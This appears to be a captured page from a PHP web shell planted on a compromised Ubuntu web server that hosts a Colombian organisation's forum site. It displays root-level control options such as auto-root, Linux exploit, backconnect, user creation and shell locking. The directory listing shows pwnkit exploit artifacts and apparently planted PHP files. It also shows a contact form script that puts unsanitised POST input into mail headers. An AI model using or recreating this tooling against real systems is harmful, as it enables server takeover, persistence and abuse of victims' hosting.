Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
FOROS-COLOMBIA /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
CIUDADES
[ DIR ]
drwxrwxrwx
FORO-MEDELLIN
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxrwxrwx
imagenes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
mailing
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
FORO.psd
2.18
MB
-rwxrwxrwx
banner_buenas.psd
995.19
KB
-rwxrwxrwx
contacto.php
1.94
KB
-rwxrwxrwx
fechas.psd
187.35
KB
-rwxrwxrwx
foro_colombia.html
11.2
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contacto.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Untitled Document</title> </head> <body> <?php if(!empty($_POST['nombre']) AND !empty($_POST['telefono']) AND !empty($_POST['correo']) AND !empty($_POST['eds']) AND !empty($_POST['mensaje']) AND !empty($_POST['departamento']) AND !empty($_POST['ciudad'])){ $to ="stokolmografico@gmail.com , info@insepet.com"; $headers = "Content-Type: text/html; charset=iso-8859-1\n"; $headers .= "From:".$_POST['eds']."\r\n"; $tema="Contacto desde el Sitio Web"; $correo=" <table border='0' cellspacing='2' cellpadding='2'> <tr> <td width='20%' align='center' bgcolor='#FFFFCC'><strong>Nombre:</strong></td> <td width='80%' align='left'>$_POST[nombre]</td> </tr> <tr> <td align='center' bgcolor='#CCFFCC'><strong>Telefono:</strong></td> <td align='left'>$_POST[telefono]</td> </tr> <tr> <td align='center' bgcolor='#CFE7FF'><strong>Correo:</strong></td> <td align='left'>$_POST[correo]</td> </tr> <tr> <td align='center' bgcolor='#CCCCFF'><strong>EDS:</strong></td> <td align='left'>$_POST[eds]</td> </tr> <tr> <td align='center' bgcolor='#FFCFE9'><strong>Mensaje:</strong></td> <td align='left'>$_POST[mensaje]</td> </tr> <tr> <td align='center' bgcolor='#F9BD87'><strong>Departamento:</strong></td> <td align='left'>$_POST[departamento]</td> </tr> <tr> <td align='center' bgcolor='#FF8F8F'><strong>Ciudad:</strong></td> <td align='left'>$_POST[ciudad]</td> </tr> </table> "; @mail($to,$tema,$correo,$headers); echo "<script language='javascript'> alert('Mensaje enviado, muchas gracias.'); window.location.href = 'http://www.insepet.com.co'; </script>"; } else { echo "No se puede enviar el formulario, verifica los campos"; } ?> </body> </html>
Close